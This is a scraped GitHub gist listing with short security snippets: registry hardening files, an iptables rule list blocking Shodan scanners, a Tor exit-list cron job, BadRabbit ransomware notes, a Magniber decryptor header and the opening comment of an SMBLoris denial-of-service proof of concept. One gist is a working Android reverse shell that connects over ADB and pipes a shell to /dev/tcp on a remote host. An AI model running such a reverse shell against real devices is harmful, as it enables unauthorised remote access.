Skip to content

Instantly share code, notes, and snippets.

Avatar

Vesselin Bontchev bontchev

View GitHub Profile
@random-robbie
random-robbie / android-shell.sh
Last active Nov 18, 2021
Android Reverse Shell
View android-shell.sh
#!/bin/bash
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie
adb connect $1:5555
adb shell sh -i >& /dev/tcp/$2/4444 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"
@CJFWeatherhead
CJFWeatherhead / crontab
Created Feb 16, 2018
Automatically redirect Tor traffic to onion (Hopefully efficiently as the if processing isn't intensive)
View crontab
##Get New Exit Node list ever 6 Hours
57 */6 * * * `curl https://check.torproject.org/cgi-bin/TorBulkExitList.py\?ip\=<yourip> | awk '{print $0" TOREX;"}' > /etc/nginx/includes/torexit.ips && service nginx restart`
@jgamblin
jgamblin / antiautosploit.py
Last active Jan 22, 2022
Blocks Shodan IPs From Scanning Your Servers.
View antiautosploit.py
#!/usr/bin/python3
import os
shodan = ["104.131.0.69", "104.236.198.48", "155.94.222.12","155.94.254.133", "155.94.254.143", "162.159.244.38", "185.181.102.18", "188.138.9.50", "198.20.69.74", "198.20.69.98", "198.20.70.114", "198.20.87.98", "198.20.99.130", "208.180.20.97", "209.126.110.38", "216.117.2.180", "66.240.192.138", "66.240.219.146", "66.240.236.119", "71.6.135.131", "71.6.146.185", "71.6.158.166", "71.6.165.200", "71.6.167.142", "82.221.105.6", "82.221.105.7", "85.25.103.50", "85.25.43.94", "93.120.27.62", "98.143.148.107", "98.143.148.135"]
for ip in shodan:
os.system("iptables -A INPUT -s {} -j DROP".format(ip))
@wdormann
wdormann / disable_win10_foistware.reg
Created Jan 2, 2018
Attempt at disabling Windows 10 automatic installation of 3rd-party foistware
View disable_win10_foistware.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy]
"Disabled"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager]
"SubscribedContent-338388Enabled"=dword:00000000
View decodeScrapeshieldEmails.py
def decodeScrapeshieldEmail(s):
retval = ""
key = int(s[:2], 16)
for char in [int(s[i:i+2], 16) for i in range(2, len(s), 2)]:
retval += chr(char ^ key)
return retval
#return "".join([chr(c^int(s[:2],2))for c in [int(s[i:i+2],16)for i in range(2,len(s),2))]])
View badrabbit-info.txt
Rough summary of developing BadRabbit info
------------------------------------------
BadRabbit is locally-self-propagating ransomware (ransom: 0.05 BTC), spreading via SMB once inside.
Requires user interaction.
Mostly targeting Russia and Ukraine so far, with a few others (Germany, Turkey, Bulgaria, Montenegro ...)
Not globally self-propagating, but could be inflicted on selected targets on purpose.
May be part of same group targeting Ukraine generally (BACKSWING) (per FireEye)
Confirmed to use ETERNALROMANCE exploit, and same source code and build chain as NotPetya (per Talos)
Mitigations are similar to Petya/NotPetya resistance. An inoculation is also available (see below).
@wdormann
wdormann / disable_ddeauto.reg
Last active Mar 26, 2021
Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016
View disable_ddeauto.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
"DontUpdateLinks"=dword:00000001
View magniber_decryptor.cpp
/*
* This tool will decrypt files encrypted by the Magniber ransomware with
* AES128 ( CBC mode ) algorithm.
*
* RE and report by MalwareBytes ( @hasherezade )
*
* https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/
*
* Decryptor written by Simone 'evilsocket' Margaritelli
*
@hannob
hannob / infineon-roca.md
Last active Oct 25, 2020
Affected Products and Keys by Infineon RSA vulnerability
View infineon-roca.md
@marcan
marcan / smbloris.c
Last active Dec 14, 2021
SMBLoris attack proof of concept
View smbloris.c
/* SMBLoris attack proof-of-concept
*
* Copyright 2017 Hector Martin "marcan" <marcan@marcan.st>
*
* Licensed under the terms of the 2-clause BSD license.
*
* This is a proof of concept of a publicly disclosed vulnerability.
* Please do not go around randomly DoSing people with it.
*
* Tips: do not use your local IP as source, or if you do, use iptables to block